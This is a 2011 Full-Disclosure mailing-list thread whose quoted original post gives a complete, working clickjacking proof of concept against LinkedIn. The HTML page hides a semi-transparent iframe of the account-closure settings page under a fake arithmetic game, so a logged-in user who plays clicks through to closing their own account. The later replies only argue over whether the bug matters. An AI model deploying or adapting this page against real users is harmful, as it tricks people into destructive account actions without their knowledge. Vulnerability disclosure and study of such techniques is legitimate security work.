seems that you aren't familiar what Clickjacking means then... No,... and am happy not to know :-) , like XSS , i do not waste time with ninoritiy bugs such as 'clickjacking' and these new such terms wich are total BS. anyhow... call it what you like, it is bs (just like the win32 dll crap and simple-xss) CRAP!) xd
On 10 October 2011 04:53, Ferenc Kovacs <[email protected]> wrote: > it seems that you aren't familiar what Clickjacking means then... > > On Sat, Oct 8, 2011 at 10:01 PM, xD 0x41 <[email protected]> wrote: > > Thats just lame dude.... if you could remove OTHER poples accounts, then > id > > say 8clap clap*... but own account... whjat about just clicking "close > > account" , and lets skip creating a html page, for this... :) cheers > > > > > > On 8 October 2011 17:06, asish agarwalla <[email protected]> > wrote: > >> > >> Be logged into Linkedin, in firefox > >> Create a HTML page using the below code > >> Open the created HTML page in a new firefox tab > >> Play the simple game > >> > >> <html> > >> <head> > >> <style> > >> button.dummy1{position:absolute;top:75px;left:177px;z-index:-10} > >> button.dummy3{position:absolute;top:214px;left:177px;z-index:-10} > >> #Div3{ > >> opacity: 0; > >> position: absolute; > >> top: 25px; > >> left: 160px; > >> } > >> #Div2{ > >> opacity: 1; > >> position: absolute; > >> top: 65px; > >> left: 340px; > >> } > >> #Div1 { > >> opacity: 1; > >> position: absolute; > >> top: 65px; > >> left: 195px; > >> } > >> #victim2 { > >> opacity: 1; > >> position: absolute; > >> top: 65px; > >> left: 50px; > >> } > >> #victim { > >> opacity: 0.4; > >> position: absolute; > >> top: -226px; > >> left: -35px; > >> width:800px; > >> height: 800px; > >> } > >> </style> > >> </head> > >> <body> > >> <div> > >> <h1>Please Click Twice on the Right Options And Then Click Submit</h1> > >> </div> > >> <div id=Div3> > >> <h1>55+27=?</h1> > >> </div> > >> <div id=victim2> > >> <h1>55 </h1> > >> </div> > >> <div id=Div1> > >> <h1>82</h1> > >> </div> > >> <div id=Div2> > >> <h1>95</h1> > >> </div> > >> <button type="button" class="dummy3">Submit</button> > >> <div id=victim> > >> <iframe > >> src=" > https://www.linkedin.com/secure/settings?closemyaccountstart=&goback=.nas_*1_*1_*1 > " > >> border=0 scrolling=no width=650 height=1100></iframe> > >> </div> > >> </body> > >> </html> > >> > >> > >> > >> _______________________________________________ > >> Full-Disclosure - We believe in it. > >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html > >> Hosted and sponsored by Secunia - http://secunia.com/ > > > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > > > -- > Ferenc Kovács > @Tyr43l - http://tyrael.hu >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
